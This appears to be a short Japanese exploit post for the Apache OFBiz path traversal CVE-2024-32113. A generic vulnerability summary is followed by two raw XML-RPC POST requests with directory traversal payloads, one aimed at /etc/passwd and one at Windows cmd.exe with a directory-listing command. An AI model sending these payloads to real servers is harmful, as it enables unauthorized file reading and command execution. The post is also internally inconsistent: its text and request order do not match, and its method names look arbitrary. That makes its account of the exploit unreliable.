
Apache OFBiz CVE-2024-32113 のパストラバーサルに対するエクスプロイト。巧妙に細工された XML-RPC リクエストを介して、脆弱なサーバー上で任意のファイル読み取りと潜在的なコマンド実行を可能にします。
Apache OFBiz 18.12.12 までに、重大(クリティカル)と分類される脆弱性が発見されました。この問題の影響を受けるのは、未知の機能です。未知の入力による操作により、パストラバーサル(ディレクトリトラバーサル)の脆弱性が引き起こされます。この製品は、制限された親ディレクトリの下にあるファイルまたはディレクトリを特定することを意図したパス名を構築するために外部入力を使用しますが、パス名内の特別な要素を適切に無害化しないため、パス名が制限されたディレクトリの外にある場所に解決される可能性があります。影響を受けるのは、機密性、完全性、および可用性です。
../../../../../../etc/passwd を使用して、Apache OFBiz サーバー上の etc/passwd ファイルを指し示します。etc/passwd ファイルの読み取りを試みます。POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>